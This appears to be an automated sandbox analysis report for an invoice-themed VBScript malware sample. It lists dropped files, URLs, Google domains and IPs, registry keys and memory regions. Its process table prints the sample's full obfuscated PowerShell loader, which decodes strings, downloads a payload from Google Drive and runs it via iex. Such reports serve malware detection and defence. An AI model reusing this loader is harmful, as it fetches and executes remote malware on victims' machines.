Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
FACTURA 130424435.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqhw45uk.d0b.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xef2zxxa.h5r.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Cabassou.Tun
|
HTML document, ASCII text, with very long lines (1692), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function
Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper,
$Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic
'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare
TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n
NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1
ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic
'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd
Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp
itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj
LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP
nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei
';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst%
.ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao
Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn
Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks
.agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd
dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA
retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned
(Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh
oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho.
aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i ErkleBogbin .liftPr,oc ');cairned (Antimeningococcic ' Di,t$JochuM,uktieButtytSvagha
Hus,lTronplKultuiSugenftod laudvikcMerist HoveuMa,kirsextuePl.st.SekteHSkovbeTilbjaBe.ald matee Stalr.rivasSyzy [ Fusi$ zithM
BaroaBaaddsRetiak onciStradnSpdbraA,odifDriftdLgdereH,brilKthibiT.kepnVggengVersieIdiotrLsten] Anth=Cytop$Muls.VInequeFyrintBo.hoe
indirOpga.aEri.cnBolige Res s nysks ande ');$Demonstrerbares212=Antimeningococcic ' DeliM sildeGavebt Bomba pre,lProdul Medli
TrstfOutpoaEduc cPlesktFootsu D ferCompleRefer.Spin,DPanscoMultiw PercnWindslBevbnoEpictaungdodTjeneF Edr ichabolUndereSlagb(Sub,e$FaenoTischirButo,nunireg
PlejeBegrunNonskdAffe.eCutarsScimi,El.os$ ulvSkondes ombyte eazeSkarlrPredes otakEctopiFodb,belekteAttessB,ase) Bucc ';$Demonstrerbares212=$Toscana[1]+$Demonstrerbares212;$Ssterskibes=$Toscana[0];cairned
(Antimeningococcic 'Sub a$Anflyg mpilun.ino SkrabSjuskaGalehlData,:BaglaSTripovProluoHe tyvInterlBarrapSaliclTro,seA jur=
R ad(FgridTUnpa eAfknasTiaart Ster-enthrPSeizuaScopetItalihbegso Polyg$Err.tS,horesRetartStipeeMicrorGenfosminimkChattiStrikbKojaneDukkes
ive)ka,ve ');while (!$Svovlple) {cairned (Antimeningococcic ' Sona$ Bi lgEpexelOmbygoS mpabMisc,aHervalTharb:Milkwa Uncel
LedilFors.eMegawrA bilgBrystiEnd rsTubulkUndereJusti=Tragi$ ForltAffekr petiuUdbenefrer. ') ;cairned $Demonstrerbares212;cairned
(Antimeningococcic 'VitelSb,odetCapitaThougrWispltBadel-FiberS IntelL ftfeFibroe PartpUindf D.age4Akter ');cairned (Antimeningococcic
' Svar$ForsygO tstl.orbioPla sbAccelaAm,lelBegga:C,ndeSBotanvPirrio orgivHrecelHeb,opHyperlQuotee ,ltr=Skvad(HolomTBordvetrapdsFlaprt
cica-panatPC.eriaRser.tg,lloh Dis Ratem$B.skaS .etssOm,egt Patce.hamarBordesMiddekUdforiS ndebGast e I,dgs un o)Overl ')
;cairned (Antimeningococcic 'A ter$huffmg BrnelVindko alkubsvmmeaPe.fol,ikol:Overgb undeu HassgDroutsHlhjde,ortyrBlaaseS,kketBostt=Optak$
fa cg SvoglTaurooForhobLame.aTeknolWesse:SpaniH Le.evUninviGa.indFrikttJordsnReacciLysesnCl,mog ournecandlrReshanBortfePakke+Pecha+By
el% Ndud$ NoniLU plyyMessin StrenIncineCentedT rbasHypoclEnfana PhysgVenipeTrag npseu,e,transConfe1Unhe,6 Span.Grif,cHaando
MannuTjrslnGunsttPrpar ') ;$Trngendes=$Lynnedslagenes16[$bugseret];}cairned (Antimeningococcic 'Tilba$CatapgDejeclWaysioContobErgoma
Mot lBandl:NonreC licehHurtir Lg,koDulutmApproeT ivlpmeddllSan taTh,matUncu.eOve.rdBasal atro = Alis OrddaGBak.de MidttRicke-BlafrCPrecioreh.bnflappt
Pas,e,aedanDudlettrprv Unart$PrismSMalaxsMeliot Carbe,onfor Appesstay k SamoiMarrob Supee phars A in ');cairned (Antimeningococcic
'T.rap$PraedgVlgerlUnprooBuks.bSta,sasoc,olFl,me:,ichlD Kropo Slagedermo Anglo=Pru.t ,romi[Squi.S SmalyForslsM liet heateF
rtimDunde. TroeCTinfooP litnChubbv ammeeLder,r C.nvtSl,ve].olyc:smelt: S.brF JenbrPompsosognemOctoaB MezuaDriftsEmblee Debi6Besky4Caco,S
ispetGlendr Gr diChantn,raktg Shop(Au or$S steCCumbrh DisprK.ldkoRescimOdileeVr,iapC taglOmegnaSanittConfeePirkldAro.a)Zoril
');cairned (Antimeningococcic ' U,fl$Snickg Belul.annioC.rysbdefa,aTrvarlPreco: OmelWBrutaiZa.zutSchtihGenaunPrinsaCont,y
Ugen Omar.=Aconi Drows[AreteSUdby yZi,zasTr.klt OvereAnthrmFje.n. ilbuTTaggeeNarcox .vertSa sr. Kon.EBochen SkelcSt,rnoReexpdbi.oiiPre
onPaga gefter]Scra :Samti:J venAHerreSunderCth.rmIC iasIIrked. OverGMicroe .nditInspiSLd,amt Pla,rTussoiparamnHet,agJordl(
Afme$ LageD Hytvo gelsebaand)Spytk ');cairned (Antimeningococcic 'Sinec$CuspygLiderlSineboR,ngeb vareaT.gthlAf,it:NegerHFrifiaStikkr
En reAndensProagkNonpeaNo.liaswi hr Lobesforpu= r.al$Sk.leWSn.taiXylyltRejs,hAutocn issaUpbanyVi.se.Beechs AnaluFilmubTergesciv.lt
Er,ir KrysiScripn DestgA non(Ce lp3Hiv.u0 Hvin1Merri6 Samt8 ues5Praes,,arbo2Baiss8Chifr3Outro0B,nzi4elect) Sani ');cairned
$Hareskaars;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cabassou.Tun && echo $"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 9 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
drive.google.com
|
142.250.105.102
|
||
|
drive.usercontent.google.com
|
173.194.219.132
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.105.102
|
drive.google.com
|
United States
|
||
|
173.194.219.132
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
13D6B31A000
|
heap
|
page read and write
|
||
|
13D6CB76000
|
heap
|
page read and write
|
||
|
13D6D0D2000
|
heap
|
page read and write
|
||
|
13D6D07C000
|
heap
|
page read and write
|
||
|
13D6D037000
|
heap
|
page read and write
|
||
|
13D6CF82000
|
heap
|
page read and write
|
||
|
1C5ECAA6000
|
heap
|
page read and write
|
||
|
1CBF0A44000
|
heap
|
page read and write
|
||
|
8A7D67E000
|
stack
|
page read and write
|
||
|
13D6CFC9000
|
heap
|
page read and write
|
||
|
13D6CAD1000
|
heap
|
page read and write
|
||
|
1C5EC640000
|
heap
|
page execute and read and write
|
||
|
13D6D084000
|
heap
|
page read and write
|
||
|
1CBF078B000
|
heap
|
page read and write
|
||
|
13D6CF8B000
|
heap
|
page read and write
|
||
|
1C58046F000
|
trusted library allocation
|
page read and write
|
||
|
13D6D043000
|
heap
|
page read and write
|
||
|
7FFB4B300000
|
trusted library allocation
|
page execute and read and write
|
||
|
13D6B1B6000
|
heap
|
page read and write
|
||
|
13D6D030000
|
heap
|
page read and write
|
||
|
13D6D09D000
|
heap
|
page read and write
|
||
|
13D6D05E000
|
heap
|
page read and write
|
||
|
13D6D0D2000
|
heap
|
page read and write
|
||
|
13D6CB75000
|
heap
|
page read and write
|
||
|
13D6CB1C000
|
heap
|
page read and write
|
||
|
8A7DABE000
|
stack
|
page read and write
|
||
|
13D6CB05000
|
heap
|
page read and write
|
||
|
13D6D02C000
|
heap
|
page read and write
|
||
|
13D6D04A000
|
heap
|
page read and write
|
||
|
13D6D030000
|
heap
|
page read and write
|
||
|
186A4FF000
|
stack
|
page read and write
|
||
|
1C5808CB000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B150000
|
trusted library allocation
|
page read and write
|
||
|
13D6D2B1000
|
heap
|
page read and write
|
||
|
1C5ECCEB000
|
heap
|
page read and write
|
||
|
13D6D019000
|
heap
|
page read and write
|
||
|
1CBF0970000
|
heap
|
page read and write
|
||
|
7FFB4B3D0000
|
trusted library allocation
|
page read and write
|
||
|
13D6CB13000
|
heap
|
page read and write
|
||
|
13D6CF82000
|
heap
|
page read and write
|
||
|
1CBF0A40000
|
heap
|
page read and write
|
||
|
13D6CB53000
|
heap
|
page read and write
|
||
|
13D6D521000
|
heap
|
page read and write
|
||
|
13D6CB32000
|
heap
|
page read and write
|
||
|
8A7D5FE000
|
stack
|
page read and write
|
||
|
1C5804B1000
|
trusted library allocation
|
page read and write
|
||
|
13D6D0EE000
|
heap
|
page read and write
|
||
|
1C5ECB77000
|
heap
|
page execute and read and write
|
||
|
13D6CB39000
|
heap
|
page read and write
|
||
|
13D6D01E000
|
heap
|
page read and write
|
||
|
7FFB4B19C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C5EC420000
|
trusted library allocation
|
page read and write
|
||
|
1C5EAAE0000
|
heap
|
page read and write
|
||
|
8A7DA3E000
|
stack
|
page read and write
|
||
|
13D6D047000
|
heap
|
page read and write
|
||
|
13D6CADA000
|
heap
|
page read and write
|
||
|
13D6B126000
|
heap
|
page read and write
|
||
|
1CBF0A45000
|
heap
|
page read and write
|
||
|
13D6CFFA000
|
heap
|
page read and write
|
||
|
7FFB4B310000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C581DD2000
|
trusted library allocation
|
page read and write
|
||
|
13D6D018000
|
heap
|
page read and write
|
||
|
8A7D7B7000
|
stack
|
page read and write
|
||
|
13D6B090000
|
heap
|
page read and write
|
||
|
13D6D123000
|
heap
|
page read and write
|
||
|
7FFB4B380000
|
trusted library allocation
|
page read and write
|
||
|
13D6D030000
|
heap
|
page read and write
|
||
|
1C5EAA2E000
|
heap
|
page read and write
|
||
|
8A7D93E000
|
stack
|
page read and write
|
||
|
13D6D271000
|
heap
|
page read and write
|
||
|
7FFB4B4C0000
|
trusted library allocation
|
page read and write
|
||
|
13D6D030000
|
heap
|
page read and write
|
||
|
13D6CFE0000
|
heap
|
page read and write
|
||
|
13D6CFFE000
|
heap
|
page read and write
|
||
|
13D6B315000
|
heap
|
page read and write
|
||
|
13D6B0F0000
|
heap
|
page read and write
|
||
|
1C5ECB14000
|
heap
|
page read and write
|
||
|
13D6D328000
|
heap
|
page read and write
|
||
|
13D6CB06000
|
heap
|
page read and write
|
||
|
13D6CB75000
|
heap
|
page read and write
|
||
|
13D6D02C000
|
heap
|
page read and write
|
||
|
13D6CF7F000
|
heap
|
page read and write
|
||
|
13D6CFD0000
|
heap
|
page read and write
|
||
|
13D6CFFA000
|
heap
|
page read and write
|
||
|
13D6CF82000
|
heap
|
page read and write
|
||
|
13D6D03A000
|
heap
|
page read and write
|
||
|
13D6D2B2000
|
heap
|
page read and write
|
||
|
7FFB4B3F0000
|
trusted library allocation
|
page read and write
|
||
|
13D6D292000
|
heap
|
page read and write
|
||
|
7FFB4B2F1000
|
trusted library allocation
|
page read and write
|
||
|
13D6CB46000
|
heap
|
page read and write
|
||
|
186A6FD000
|
stack
|
page read and write
|
||
|
13D6B11B000
|
heap
|
page read and write
|
||
|
13D6CB75000
|
heap
|
page read and write
|
||
|
13D6D037000
|
heap
|
page read and write
|
||
|
1C581DDB000
|
trusted library allocation
|
page read and write
|
||
|
1C5EABA0000
|
heap
|
page readonly
|
||
|
13D6CF82000
|
heap
|
page read and write
|
||
|
13D6D02C000
|
heap
|
page read and write
|
||
|
13D6D327000
|
heap
|
page read and write
|
||
|
13D6CB5F000
|
heap
|
page read and write
|
||
|
13D6D29D000
|
heap
|
page read and write
|
||
|
1C5804F3000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B340000
|
trusted library allocation
|
page read and write
|
||
|
13D6D522000
|
heap
|
page read and write
|
||
|
1C5ECA20000
|
heap
|
page read and write
|
||
|
13D6D03A000
|
heap
|
page read and write
|
||
|
13D6D12E000
|
heap
|
page read and write
|
||
|
13D6D0E3000
|
heap
|
page read and write
|
||
|
1C58214D000
|
trusted library allocation
|
page read and write
|
||
|
13D6D327000
|
heap
|
page read and write
|
||
|
7FFB4B400000
|
trusted library allocation
|
page read and write
|
||
|
13D6CB22000
|
heap
|
page read and write
|
||
|
13D6D2C2000
|
heap
|
page read and write
|
||
|
1C5ECA79000
|
heap
|
page read and write
|
||
|
13D6D0DA000
|
heap
|
page read and write
|
||
|
13D6D0C5000
|
heap
|
page read and write
|
||
|
1C5ECF20000
|
heap
|
page read and write
|
||
|
1C590001000
|
trusted library allocation
|
page read and write
|
||
|
13D6CB27000
|
heap
|
page read and write
|
||
|
13D6CADD000
|
heap
|
page read and write
|
||
|
13D6CF71000
|
heap
|
page read and write
|
||
|
13D6CFFE000
|
heap
|
page read and write
|
||
|
13D6D0CF000
|
heap
|
page read and write
|
||
|
7FFB4B420000
|
trusted library allocation
|
page read and write
|
||
|
13D6D0D7000
|
heap
|
page read and write
|
||
|
13D6CB1A000
|
heap
|
page read and write
|
||
|
13D6CB75000
|
heap
|
page read and write
|
||
|
13D6B1A7000
|
heap
|
page read and write
|
||
|
13D6B1D0000
|
heap
|
page read and write
|
||
|
1C5902F8000
|
trusted library allocation
|
page read and write
|
||
|
13D6D03A000
|
heap
|
page read and write
|
||
|
8A7E50E000
|
stack
|
page read and write
|
||
|
1C58048C000
|
trusted library allocation
|
page read and write
|
||
|
13D6CB1C000
|
heap
|
page read and write
|
||
|
13D6CC00000
|
remote allocation
|
page read and write
|
||
|
13D6D067000
|
heap
|
page read and write
|
||
|
13D6D04E000
|
heap
|
page read and write
|
||
|
7FFB4B470000
|
trusted library allocation
|
page read and write
|
||
|
13D6D08C000
|
heap
|
page read and write
|
||
|
13D6CB70000
|
heap
|
page read and write
|
||
|
7FFB4B440000
|
trusted library allocation
|
page read and write
|
||
|
13D6D03A000
|
heap
|
page read and write
|
||
|
13D6D0B5000
|
heap
|
page read and write
|
||
|
1C5ECB80000
|
heap
|
page read and write
|
||
|
1C5EC3EA000
|
heap
|
page read and write
|
||
|
13D6D113000
|
heap
|
page read and write
|
||
|
13D6CB2A000
|
heap
|
page read and write
|
||
|
13D6D13D000
|
heap
|
page read and write
|
||
|
13D6D480000
|
heap
|
page read and write
|
||
|
8A7E58D000
|
stack
|
page read and write
|
||
|
13D6D071000
|
heap
|
page read and write
|
||
|
13D6CAE1000
|
heap
|
page read and write
|
||
|
13D6CC20000
|
heap
|
page read and write
|
||
|
13D6D13D000
|
heap
|
page read and write
|
||
|
13D6B1AB000
|
heap
|
page read and write
|
||
|
13D6CAF6000
|
heap
|
page read and write
|
||
|
13D6B0F8000
|
heap
|
page read and write
|
||
|
13D6D0A5000
|
heap
|
page read and write
|
||
|
13D6B11A000
|
heap
|
page read and write
|
||
|
13D6D037000
|
heap
|
page read and write
|
||
|
1C5ECAEC000
|
heap
|
page read and write
|
||
|
13D6D2C2000
|
heap
|
page read and write
|
||
|
1C5EAB00000
|
heap
|
page read and write
|
||
|
13D6CFE0000
|
heap
|
page read and write
|
||
|
1C5ECC94000
|
heap
|
page read and write
|
||
|
7FFB4B1F6000
|
trusted library allocation
|
page read and write
|
||
|
1C5EC6D0000
|
heap
|
page execute and read and write
|
||
|
13D6D133000
|
heap
|
page read and write
|
||
|
13D6D030000
|
heap
|
page read and write
|
||
|
1C58049C000
|
trusted library allocation
|
page read and write
|
||
|
13D6CC00000
|
remote allocation
|
page read and write
|
||
|
8A7DB3B000
|
stack
|
page read and write
|
||
|
13D6B126000
|
heap
|
page read and write
|
||
|
1C5EAA71000
|
heap
|
page read and write
|
||
|
1C5EC4F5000
|
heap
|
page read and write
|
||
|
13D6D070000
|
heap
|
page read and write
|
||
|
13D6D0E6000
|
heap
|
page read and write
|
||
|
186A7FB000
|
stack
|
page read and write
|
||
|
13D6D074000
|
heap
|
page read and write
|
||
|
1C5812CB000
|
trusted library allocation
|
page read and write
|
||
|
1C5818BC000
|
trusted library allocation
|
page read and write
|
||
|
13D6D01E000
|
heap
|
page read and write
|
||
|
13D6D068000
|
heap
|
page read and write
|
||
|
13D6B318000
|
heap
|
page read and write
|
||
|
13D6CB01000
|
heap
|
page read and write
|
||
|
1C5EABE5000
|
heap
|
page read and write
|
||
|
8A7D16E000
|
stack
|
page read and write
|
||
|
7FFB4B460000
|
trusted library allocation
|
page read and write
|
||
|
186A9FF000
|
stack
|
page read and write
|
||
|
13D6CFFE000
|
heap
|
page read and write
|
||
|
13D6CB3B000
|
heap
|
page read and write
|
||
|
13D6D037000
|
heap
|
page read and write
|
||
|
1C5804EF000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1F0000
|
trusted library allocation
|
page read and write
|
||
|
1C5ECA9C000
|
heap
|
page read and write
|
||
|
13D6D21A000
|
heap
|
page read and write
|
||
|
186A1FF000
|
stack
|
page read and write
|
||
|
13D6CB06000
|
heap
|
page read and write
|
||
|
7FFB4B450000
|
trusted library allocation
|
page read and write
|
||
|
13D6CC00000
|
remote allocation
|
page read and write
|
||
|
13D6D0F3000
|
heap
|
page read and write
|
||
|
8A7D8B9000
|
stack
|
page read and write
|
||
|
13D6D13D000
|
heap
|
page read and write
|
||
|
13D6D02C000
|
heap
|
page read and write
|
||
|
7FFB4B480000
|
trusted library allocation
|
page read and write
|
||
|
13D6D02C000
|
heap
|
page read and write
|
||
|
7FFB4B4B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B322000
|
trusted library allocation
|
page read and write
|
||
|
13D6D030000
|
heap
|
page read and write
|
||
|
13D6D0FB000
|
heap
|
page read and write
|
||
|
13D6D037000
|
heap
|
page read and write
|
||
|
13D6D01D000
|
heap
|
page read and write
|
||
|
13D6D2A4000
|
heap
|
page read and write
|
||
|
13D6D0AD000
|
heap
|
page read and write
|
||
|
13D6D135000
|
heap
|
page read and write
|
||
|
13D6CAF2000
|
heap
|
page read and write
|
||
|
1C5EC4F0000
|
heap
|
page read and write
|
||
|
7FFB4B350000
|
trusted library allocation
|
page read and write
|
||
|
13D6D2C0000
|
heap
|
page read and write
|
||
|
1CBF0890000
|
heap
|
page read and write
|
||
|
1C5EAA27000
|
heap
|
page read and write
|
||
|
1C5EA8F0000
|
heap
|
page read and write
|
||
|
13D6CAF5000
|
heap
|
page read and write
|
||
|
186A2FE000
|
stack
|
page read and write
|
||
|
13D6CAE5000
|
heap
|
page read and write
|
||
|
13D6D0B0000
|
heap
|
page read and write
|
||
|
13D6B31E000
|
heap
|
page read and write
|
||
|
13D6B1A9000
|
heap
|
page read and write
|
||
|
13D6CB75000
|
heap
|
page read and write
|
||
|
13D6CFD0000
|
heap
|
page read and write
|
||
|
8A7D837000
|
stack
|
page read and write
|
||
|
13D6D03A000
|
heap
|
page read and write
|
||
|
13D6D037000
|
heap
|
page read and write
|
||
|
13D6B198000
|
heap
|
page read and write
|
||
|
13D6D12E000
|
heap
|
page read and write
|
||
|
13D6CB74000
|
heap
|
page read and write
|
||
|
13D6CFFA000
|
heap
|
page read and write
|
||
|
13D6B1A9000
|
heap
|
page read and write
|
||
|
13D6D01E000
|
heap
|
page read and write
|
||
|
13D6B125000
|
heap
|
page read and write
|
||
|
1CBF0990000
|
heap
|
page read and write
|
||
|
1C5EAA48000
|
heap
|
page read and write
|
||
|
13D6D103000
|
heap
|
page read and write
|
||
|
13D6CB43000
|
heap
|
page read and write
|
||
|
13D6D2C0000
|
heap
|
page read and write
|
||
|
1C5ECD23000
|
heap
|
page read and write
|
||
|
A5BF6FD000
|
stack
|
page read and write
|
||
|
13D6D0A0000
|
heap
|
page read and write
|
||
|
13D6CB09000
|
heap
|
page read and write
|
||
|
1C5EC3E0000
|
heap
|
page read and write
|
||
|
1C5EAA36000
|
heap
|
page read and write
|
||
|
1C5ECAC1000
|
heap
|
page read and write
|
||
|
13D6D018000
|
heap
|
page read and write
|
||
|
1C581E49000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B3C0000
|
trusted library allocation
|
page read and write
|
||
|
13D6D378000
|
heap
|
page read and write
|
||
|
186ABFB000
|
stack
|
page read and write
|
||
|
13D6CAEA000
|
heap
|
page read and write
|
||
|
1C581DC8000
|
trusted library allocation
|
page read and write
|
||
|
13D6CFE0000
|
heap
|
page read and write
|
||
|
13D6D13D000
|
heap
|
page read and write
|
||
|
13D6CFC9000
|
heap
|
page read and write
|
||
|
1C581E07000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2FA000
|
trusted library allocation
|
page read and write
|
||
|
1C580862000
|
trusted library allocation
|
page read and write
|
||
|
186A0FA000
|
stack
|
page read and write
|
||
|
7FFB4B390000
|
trusted library allocation
|
page read and write
|
||
|
A5BF8FF000
|
stack
|
page read and write
|
||
|
13D6CB4E000
|
heap
|
page read and write
|
||
|
13D6D0FE000
|
heap
|
page read and write
|
||
|
7FFB4B3B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B142000
|
trusted library allocation
|
page read and write
|
||
|
13D6CFC9000
|
heap
|
page read and write
|
||
|
1C580488000
|
trusted library allocation
|
page read and write
|
||
|
13D6CB75000
|
heap
|
page read and write
|
||
|
13D6D418000
|
heap
|
page read and write
|
||
|
13D6D01E000
|
heap
|
page read and write
|
||
|
13D6CB57000
|
heap
|
page read and write
|
||
|
7FFB4B490000
|
trusted library allocation
|
page read and write
|
||
|
13D6CB0E000
|
heap
|
page read and write
|
||
|
13D6D10B000
|
heap
|
page read and write
|
||
|
13D6D027000
|
heap
|
page read and write
|
||
|
13D6B31C000
|
heap
|
page read and write
|
||
|
13D6D29F000
|
heap
|
page read and write
|
||
|
13D6CFFA000
|
heap
|
page read and write
|
||
|
7FFB4B14D000
|
trusted library allocation
|
page execute and read and write
|
||
|
13D6D02C000
|
heap
|
page read and write
|
||
|
13D6D2C0000
|
heap
|
page read and write
|
||
|
8A7D73F000
|
stack
|
page read and write
|
||
|
13D6D04C000
|
heap
|
page read and write
|
||
|
13D6CAF9000
|
heap
|
page read and write
|
||
|
1C581DAF000
|
trusted library allocation
|
